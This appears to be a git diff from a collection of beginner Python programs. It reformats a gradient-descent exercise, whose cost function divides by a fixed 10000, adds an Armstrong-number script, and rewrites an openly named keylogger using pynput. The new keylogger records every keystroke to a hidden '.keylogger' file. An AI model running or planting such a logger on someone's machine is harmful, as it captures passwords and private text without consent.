diff --git a/MachineLearning/gradient_descent.py b/MachineLearning/gradient_descent.py index 6c89d92..ddffa81 100644 --- a/MachineLearning/gradient_descent.py +++ b/MachineLearning/gradient_descent.py @@ -1,31 +1,3 @@ -#################################################################################### -## PROBLEM1: Gradient Descent -## Gradient descent is a popular optimization technique to solve many -## machine learning problems. In this case, we will explore the gradient -## descent algorithm to fit a line for the given set of 2-D points. -## ref: https://tinyurl.com/yc4jbjzs -## ref: https://spin.atomicobject.com/2014/06/24/gradient-descent-linear-regression/ -## -## -## input: directory of faces in ./data/1_points.csv/ -## function for reading points is provided -## -## -## your task: fill the following functions: -## evaluate_cost -## evaluate_gradient -## udpate_params -## NOTE: do NOT change values of 'init_params' and 'max_iterations' in optimizer -## -## -## output: cost after convergence (rmse, lower the better) -## -## -## NOTE: all required modules are imported. DO NOT import new modules. -## NOTE: references are given intline -## tested on Ubuntu14.04, 22Oct2017, Abhilash Srikantha -#################################################################################### - import numpy as np import matplotlib.pyplot as plt import time @@ -33,43 +5,37 @@ def load_data(fname): points = np.loadtxt(fname, delimiter=',') y_ = points[:,1] - # append '1' to account for the intercept - x_ = np.ones([len(y_),2]) + x_ = np.ones([len(y_), 2]) x_[:,0] = points[:,0] - # display plot - #plt.plot(x_[:,0], y_, 'ro') - #plt.xlabel('x-axis') - #plt.ylabel('y-axis') - #plt.show() print('data loaded. 
x:{} y:{}'.format(x_.shape, y_.shape)) return x_, y_ -def evaluate_cost(x_,y_,params): +def evaluate_cost(x_, y_, params): tempcost = 0 for i in range(len(y_)): tempcost += (y_[i] - ((params[0] * x_[i,0]) + params[1])) ** 2 - return tempcost / float(10000) + return tempcost / float(10000) -def evaluate_gradient(x_,y_,params): +def evaluate_gradient(x_, y_, params): m_gradient = 0 b_gradient = 0 N = float(len(y_)) for i in range(len(y_)): - m_gradient += -(2/N) * (x_[i,0] * (y_[i] - ((params[0] * x_[i,0]) + params[1]))) + m_gradient += -(2/N) * (x_[i,0] * (y_[i] - ((params[0] * x_[i,0]) + params[1]))) b_gradient += -(2/N) * (y_[i] - ((params[0] * x_[i,0]) + params[1])) - return [m_gradient,b_gradient] + return [m_gradient, b_gradient] def update_params(old_params, grad, alpha): new_m = old_params[0] - (alpha * grad[0]) new_b = old_params[1] - (alpha * grad[1]) - return [new_m,new_b] + return [new_m, new_b] # initialize the optimizer -optimizer = {'init_params':np.array([4.5,2.0]) , - 'max_iterations':10000, - 'alpha':0.69908, - 'eps':0.0000001, - 'inf':1e10} +optimizer = {'init_params': np.array([4.5, 2.0]), + 'max_iterations': 10000, + 'alpha': 0.69908, + 'eps': 0.0000001, + 'inf': 1e10} # load data x_, y_ = load_data("./data/1_points.csv") @@ -83,16 +49,16 @@ def update_params(old_params, grad, alpha): old_cost = 1e10 for iter_ in range(optimizer['max_iterations']): # evaluate cost and gradient - cost = evaluate_cost(x_,y_,params) - grad = evaluate_gradient(x_,y_,params) + cost = evaluate_cost(x_, y_, params) + grad = evaluate_gradient(x_, y_, params) # display - if(iter_ % 10 == 0): + if iter_ % 10 == 0: print('iter: {} cost: {} params: {}'.format(iter_, cost, params)) # check convergence - if(abs(old_cost - cost) < optimizer['eps']): + if abs(old_cost - cost) < optimizer['eps']: break - # udpate parameters - params = update_params(params,grad,optimizer['alpha']) + # update parameters + params = update_params(params, grad, optimizer['alpha']) old_cost = cost 
except: cost = optimizer['inf'] diff --git a/Programs/P79_SimplePythonKeylogger.py b/Programs/P79_SimplePythonKeylogger.py index ff08573..d402add 100644 --- a/Programs/P79_SimplePythonKeylogger.py +++ b/Programs/P79_SimplePythonKeylogger.py @@ -4,7 +4,7 @@ # 1. pyxhook.py: file is provided in the folder itself # 2. Xlib: sudo pip3 install python3-Xlib -import pyxhook +'''import pyxhook import time # functions to write a newline character into the file @@ -47,3 +47,25 @@ def key_press_event(event): # Close the listener when we are done hookman.cancel() +''' + +from pynput.keyboard import Key, Listener + +# Functions to handle key press and release events +def on_key_press(key): + try: + with open('.keylogger', 'a') as f: + f.write(str(key.char)) + except AttributeError: + # Handle special keys + with open('.keylogger', 'a') as f: + f.write(str(key)) + +def on_key_release(key): + if key == Key.esc: + # Terminate the listener + return False + +# Create a listener for both key press and release events +with Listener(on_press=on_key_press, on_release=on_key_release) as listener: + listener.join() diff --git a/armstrong.py b/armstrong.py new file mode 100644 index 0000000..0871bee --- /dev/null +++ b/armstrong.py @@ -0,0 +1,7 @@ +lower = 100 +upper = 2000 + +armstrong_numbers = [num for num in range(lower, upper + 1) if num == sum(int(digit) ** len(str(num)) for digit in str(num))] + +for armstrong in armstrong_numbers: + print(armstrong)